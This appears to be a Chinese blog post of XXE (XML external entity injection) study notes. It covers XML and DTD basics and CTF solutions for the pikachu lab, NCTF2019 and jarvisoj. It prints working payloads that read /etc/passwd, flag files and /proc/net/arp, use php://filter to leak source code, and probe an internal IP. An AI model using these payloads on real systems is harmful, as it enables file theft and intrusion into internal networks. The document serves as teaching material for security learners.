XXE漏洞学习笔记

最新推荐文章于 2021-03-01 16:31:50 发布
最新推荐文章于 2021-03-01 16:31:50 发布
阅读量293 收藏
点赞数
分类专栏: web安全 文章标签: xml web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CyhDl666/article/details/113182295
版权

文章目录

XXE

XML学习

  • XML外部实体注入简称XXE漏洞,XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。
  • 菜鸟教程实例
<?xml version="1.0" encoding="UTF-8"?>
<note>
  <to>Tove</to>
  <from>Jani</from>
  <heading>Reminder</heading>
  <body>Don't forget me this weekend!</body>
</note>

结构

  • 必须包含根元素,它是所有其他元素的父元素,下面是xml的正常结构:
<root>
  <child>
    <subchild>.....</subchild>
  </child>
</root>

属性和元素

  • 将有关数据的数据存储为属性,而数据本身应当存储为元素。
  • 例如:下面实例的id索引用来表示XML元素 将其作为属性
<messages>
<note id="501">
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>
<note id="502">
<to>Jani</to>
<from>Tove</from>
<heading>Re: Reminder</heading>
<body>I will not</body>
</note>
</messages>

验证

  • XML 文档必须有一个根元素
  • XML元素都必须有一个关闭标签
  • XML 标签对大小写敏感
  • XML 元素必须被正确的嵌套
  • XML 属性值必须加引号

DTD 重点

  • 文档类型定义,用来为XML文档定义语义约束
<!-- 内部声明 -->
<!DOCTYPE 根元素[元素声明]>
<!-- 外部引用 -->
<!DOCTYPE 根元素名称 SYSTEM "外部DTD的URI" >
<!-- 引用公共DTD -->
<!DOCTYPE 根元素名称 PUBLIC "DTD标识名" "公用DTD的URL">
  • 内部声明实例
<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
  • 外部声明实例
<!DOCTYPE root-element SYSTEM "filename">

XXE漏洞

pikachu漏洞平台

  • 提交一个正常的xml
<?xml version = "1.0"?>
<!DOCTYPE note [ <!ENTITY xxe "我的努力是要成为别人眼中不朽">]>
<name>&xxe;</name>

在这里插入图片描述

  • 利用外部声明实例去读取信息
<?xml vsrsion = "1.0"?>
<!DOCTYPE note[ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<name>&xxe;</name>
  • 很奇怪我的php好像无法读取这个信息
  • 更改了php的版本和加了扩展也不行 只能尝试一下别的方法了
<?xml version = "1.0"?>
<!DOCTYPE note [
    <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">
]>
<name>&xxe;</name>
  • 这个又可以了,心态爆炸

[NCTF2019]Fake XML cookbook

  • 进去先用burpsuit抓个登录的包
    在这里插入图片描述
  • 很明显xml<user><username>123</username><password>123</password></user>是xml的格式
  • 利用xml去读取flag的信息 即可得到flag
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY flag SYSTEM "file:///flag">
  ]>
<user><username>&flag;</username><password></password></user>

[NCTF2019]True XML cookbook

  • 同样先用burpsuit抓包
  • 按照上一题的做法没有得到flag
  • 但是得到了题目源码的地址/var/www/html/doLogin.php
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY flag SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.php">
]>
<user><username>&flag;</username><password>123</password></user>
  • 用php伪协议读取页面源码 发现没什么用
  • 尝试攻入内网
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY flag SYSTEM "file:///etc/hosts">
]>
  • 用etc/hosts读取当前域名下的ip地址奈何没读出来…
    在这里插入图片描述
  • 尝试一下file:///proc/net/arp读取
    在这里插入图片描述
  • 发现10.102.252.x的ip地址
    在这里插入图片描述- Bp爆破一下发现10.102.252.11这个ip地址读取一下可以得到flag
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY flag SYSTEM "http://10.102.252.11">
]>
<user><username>&flag;</username><password>123</password></user>

jarvisoj

在这里插入图片描述

  • 题目链接:http://web.jarvisoj.com:9882/
  • 解题
    在这里插入图片描述
  • 将Content-Type:application/json 改为 application/xml
  • 然后插入下面的xml代码
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
 <!ENTITY xxe SYSTEM "file:///home/ctf/flag.txt">
 ]>
<name>
  &xxe;
</name>
海上清辉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XXE靶机夺取Flag复现
a1245678899的博客
10-15 601
1.首先用netdiscover对kali同一网段的进行探测。15.将其编入文档进行后进行访问得到flag.5.对这两个目录进行访问发现了两个登录页面。6.使用burpsuit对其进行抓包处理。14.对其进行base64解码发现。12.对其进行解码发现新的路径。13.进行重发以后的到新的代码。4.发现了两个禁止访问的目录。
XXE漏洞XML外部实体注入漏洞
Freedomua的博客
12-04 710
XXE漏洞XML外部实体注入漏洞) 一、XML基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 所有的 XML 文档(以及 HTML 文档)均由以下简单的构建模块构成: (1)元素 (2)属性 (3)实体 (4)PCDATA (5)CDATA 下面是每个构建模块的简要描述。 1,元素 元素是 XML以及HTML文档的主要构建模块,元素可包含文本、其他元素或者是空的。 实例: body text in between
DTD
heroben39的专栏
10-25 257
文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。 DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 内部的 DOCTYPE 声明 假如 DTD 被包含在您的 XML 源文件中,它应当通过下面的语法包装在一个 DOCTYPE 声明中: 带有 DTD 的 XML 文档实例(请在 IE5 以及更高的版本打开,并选择查看源代
从一道题目学习XXE漏洞
蚁景网安学院
03-01 515
本文涉及知识点实操练习:XXE漏洞分析与实践 (通过该实验了解XXE漏洞的基础知识及演示实践。) 0x01.xxe漏洞 XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 0x02.xml
Vulnhub-xxe靶机通关,获取最终flag
test\\的博客
03-23 1397
1、 信息收集,nmap探测靶机地址 得到目标地址192.168.248.168,只开放80端口 2、 使用御剑对目标网站后台扫描 3、 发现存在信息页面 4、 访问/xxe路径 5、 传参抓包,得知通过xml传参 6、 构造恶意xml,替换参数 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE r [ <!ELE...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXEXML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
5、XXE漏洞pdf资料
最新发布
10-15
XXEXML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的恶意XML输入时。XML(eXtensible Markup Language)是一种用于存储和传输数据的标记语言,它的主要特点是允许...
105-web漏洞挖掘之XXE漏洞1
08-03
XXE漏洞详解】 XXE,全称为XML External Entity Injection,是XML解析器在处理XML输入时因未能正确配置,允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体,进而获取敏感信息、执行...
XXE漏洞
chaojixiaojingang
08-31 1万+
XXE漏洞概念:        XXEXML External Entity injection)XML 外部实体注入漏洞,如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞,这个漏洞需要大家还有一定的XML协议基础,因此为了更好的去理解漏洞本身原理,必须给大家介绍一下XML相关的知识点。 (1)XML概念:     ...
mutillidae平台:XSS Payload 之cookie窃取练习
whiteinblack
09-26 2118
此次练习主要是用mutillidae靶场实现了《白帽子讲web安全》上的xss payload 窃取用户cookie实例。 需要创建两个用户进行测试:墨中白,test 用账号墨中白进入xss blog练习页面: 在文本框中插入代码 &lt;script type="text/javascript" src="http://47.116.10.120/wxx.js"&gt;&lt;/s...
XXE漏洞以及Blind XXE总结
热门推荐
Exploit的小站~
05-10 5万+
 转载请注明出处:http://blog.csdn.net/u011721501 0、前言 XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XEE漏洞的基础上,发展出了BlindXXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVGheader)应用比较广泛,此外,网上有一些在线XML格式...
XXE漏洞学习
0nc3的博客
04-09 649
0x00 什么是XXE XXEXML External Entity Injection)即XML外部实体注入。漏洞是在对非安全的外部实体数据进⾏行处理时引发的安全问题。 所以,学习XXE漏洞当然要先了解XML基础。 0x01 XML基础 1.文档结构 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 <!--XML声明--> <?xml version...
文件包含、文件上传漏洞
CyhDl666的博客
01-28 1650
文章目录文件包含漏洞1.[HCTF 2018]WarmUp2.[ACTF2020 新生赛]Include3.[极客大挑战 2019]Secret File4.[BJDCTF2020]ZJCTF 不过如此 文件包含漏洞 不多说了 直接做题 1.[HCTF 2018]WarmUp F12进入source.php文件 <?php highlight_file(__FILE__); class emmm { public static function che
buuctf web
CyhDl666的博客
02-01 921
文章目录[GYCTF2020]Blacklist[ZJCTF 2019]NiZhuanSiWei[CISCN2019 华北赛区 Day2 Web1]Hack World [GYCTF2020]Blacklist 注入题 先输入’页面返回报错确定闭合方式 直接准备union注入1' union select 1,2# 返回一个正则表达式return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./
PHP序列化和反序列化漏洞
CyhDl666的博客
01-30 632
文章目录序列化序列化数组序列化对象反序列化序列化漏洞+实例_wakeup()漏洞的绕过攻防世界:unserialize3攻防世界:Web_php_unserialize函数同名方法利用session利用 序列化 序列化数组 serialize()函数可以序列化对象和数组返回一个字符串 序列化数组 <?php $sites = array('Google', 'Runoob', 'Facebook'); $serialized_data = serialize($sites); echo $ser
geoserver xxe漏洞
09-02
Geoserver是一个开源的地理信息系统(GIS)软件,它用于发布和共享地理数据和服务。然而,Geoserver在某些情况下可能存在一个称为XXEXML外部实体)漏洞XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入时,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入攻击。攻击者可以通过向Geoserver发送包含恶意XML实体引用的请求,来读取系统上的敏感文件或执行任意代码。 为了防止Geoserver XXE漏洞的利用,有几个关键的步骤可以采取: 1. 更新Geoserver:确保您使用的是最新版本的Geoserver。开源软件的维护者通常会修复已知的漏洞,并在新版本中发布修复程序。 2. 安全的配置文件处理:确保Geoserver的配置文件中没有不必要的文件,因为攻击者可能会利用这些文件访问敏感信息。 3. 过滤和验证用户输入:在输入和输出时,对用户提交的XML数据进行充分验证和过滤。这将有助于防止输入的恶意XML实体被执行。 4. 强化安全意识:向Geoserver用户和管理员提供适当的培训,以提高他们对安全问题的意识。这将有助于减少社会工程学攻击和恶意操作。 总之,Geoserver XXE漏洞是一种可以利用的安全漏洞,但通过更新软件、安全配置文件处理、过滤验证用户输入和提高安全意识,可以有效地减少这种漏洞的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值